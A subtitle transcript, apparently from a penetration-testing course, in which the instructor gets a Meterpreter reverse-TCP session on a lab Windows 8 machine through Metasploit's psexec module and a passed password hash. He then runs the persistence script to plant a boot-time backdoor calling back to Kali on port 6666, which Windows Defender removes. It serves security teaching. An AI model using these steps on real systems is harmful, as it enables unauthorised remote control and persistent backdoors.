﻿1
00:00:00,360 --> 00:00:04,740
So let's try to use the Meterpreter's persistence method on a Windows 8 victim.

2
00:00:15,480 --> 00:00:22,290
As you know, we need to have a Meterpreter session on the victim first, so I'm going to use the PsExec

3
00:00:22,320 --> 00:00:24,840
module to get the session on my Windows 8.

4
00:00:26,360 --> 00:00:27,760
Search psexec.

5
00:00:28,970 --> 00:00:41,780
Use exploit/windows/smb/psexec, set payload windows/meterpreter/reverse_tcp, now show the options and

6
00:00:41,780 --> 00:00:47,150
now set the options: RHOST as Windows 8, LHOST as Kali.

7
00:00:48,920 --> 00:00:54,770
Username of my Windows 8 was admin and password hash was on the desktop.

8
00:00:57,030 --> 00:01:08,520
Here, so I'll copy it and paste it as the SMBPass. Now leave the ports at their default values and run the

9
00:01:08,520 --> 00:01:09,090
exploit.

10
00:01:12,850 --> 00:01:17,770
There, now we have a Meterpreter session on the Windows 8 system.

11
00:01:19,000 --> 00:01:22,960
So we run sysinfo to check the system and the connection.

12
00:01:23,910 --> 00:01:25,350
And here are the results.

13
00:01:28,110 --> 00:01:32,820
So now let's run the persistence method with -h first to see the parameters.

14
00:01:33,820 --> 00:01:36,160
And now we're ready to prepare the command.

15
00:01:37,600 --> 00:01:39,940
-A to start the handler automatically.

16
00:01:40,900 --> 00:01:49,480
Now, I don't set the payload this time because the default payload is exactly what I want. -X to auto

17
00:01:49,480 --> 00:01:51,010
start when the system boots.

18
00:01:52,460 --> 00:01:55,160
And ten seconds between each try.

19
00:01:56,120 --> 00:02:04,790
-p for the port. Now, I'll use port 6666 this time, and finally -r for the listen host,

20
00:02:05,120 --> 00:02:10,220
which is Kali for me. Hit Enter to run the method.

21
00:02:12,000 --> 00:02:18,750
And it's finished, so let's look at the messages to see what happened. It says the persistent script

22
00:02:18,750 --> 00:02:21,870
has been written to the temp folder under the Windows folder.

23
00:02:22,410 --> 00:02:25,660
So let's look at the victim machine and see if that's correct.

24
00:02:26,520 --> 00:02:29,790
We'll go to the temp folder in Windows Explorer.

25
00:02:31,040 --> 00:02:39,440
Oh, Windows Defender detected the file, so to cross-check, I go to the temp folder to see whether

26
00:02:39,440 --> 00:02:41,080
the script file is in there or not.

27
00:02:43,570 --> 00:02:52,120
No, the script is not here. It's detected by Windows Defender and deleted, so we should find another

28
00:02:52,120 --> 00:02:54,340
way to open a persistent backdoor.

29
00:02:55,000 --> 00:02:56,350
There's always more than one way.

